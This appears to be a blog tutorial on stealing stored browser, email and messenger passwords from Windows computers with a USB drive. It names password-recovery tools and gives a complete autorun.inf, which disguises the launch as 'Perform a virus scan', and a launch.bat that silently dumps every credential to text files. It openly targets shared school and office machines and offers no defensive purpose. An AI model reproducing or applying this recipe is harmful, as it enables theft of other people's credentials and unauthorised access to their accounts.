Here, I come with a new cool way to hack passwords physically, it means that physical approach matters a lot for using this method. We will use a usb and some applications to hack stored passwords in any computer. As we know now-a-days people sign up at large number of websites and to remember them all they store their passwords in the computer. We will try recovering them automatically using a USB drive. Yes, All we need is to plug the USB in any port. This trick will work for Windows 7, Windows Xp, Windows 2000 and Windows Vista also. All the applications included are light enough and very portable that these can be pasted and downloaded in the USB disk in few seconds. You can also hack stored messenger passwords. It will help you if you are using a school combined computer or an official may be. Lets start the tutorial:
Here are the applications which you will need to hack Passwords using USB:
Messen Pass – MessenPass is a password recovery tool that reveals the passwords of the many instant messenger applications as i have already created post over it.
Mail Passview– Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients : Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts), Windows Mail, Windows Live Mail, IncrediMail, Eudora, Netscape 6.x/7.x (If the password is not encrypted with master password), Mozilla Thunderbird (If the password is not encrypted with master password), Group Mail Free, Yahoo! Mail – If the password is saved in Yahoo! Messenger application, Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application, Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
IE Passview– As the name tells that it will be used to recover and hack all the passwords stored in the internet explorer. It supports all new and old versions.
Protected Storage PassView – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.
Starting from version 1.60, this utility reveals all AutoComplete strings stored in Internet Explorer, not only the AutoComplete password, as in the previous versions.
PasswordFox – PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Update:- You can now also recover chrome and opera saved passwords. Just download these applications and add them to your attack. Since, Now you may basic knowledge that how this attack may work. First read complete post and then add these both. OperPassView and ChromePass
So, I think you will wonder that what else is left to be attacked, Yes, Its a complete attack. What is requires is physical access. After downloading all the files extract them.
1) After extracting all the five tools, Copy only *.exe files in the USB drive. i-e copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
2) Create a new notepad document and write following lines in it:
[autorun]
open=launch.bat
ACTION= Perform a virus scan
After that save it as autorun.inf and now copy this file to USB drive.
3) After that again open notepad and paste this in it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save it as launch.bat and copy this into your USB drive.
How to Use this USB drive?
Now your toolkit is ready and you are all set to steal the passwords. You can use this pendrive on any computer to steal the stored passwords. Just follow these steps:
1) Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2) In the pop-up window, select the first option (Perform a virus scan).
3) Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .txt files.
4) Remove the pendrive and you’ll see the stored passwords in the .txt files.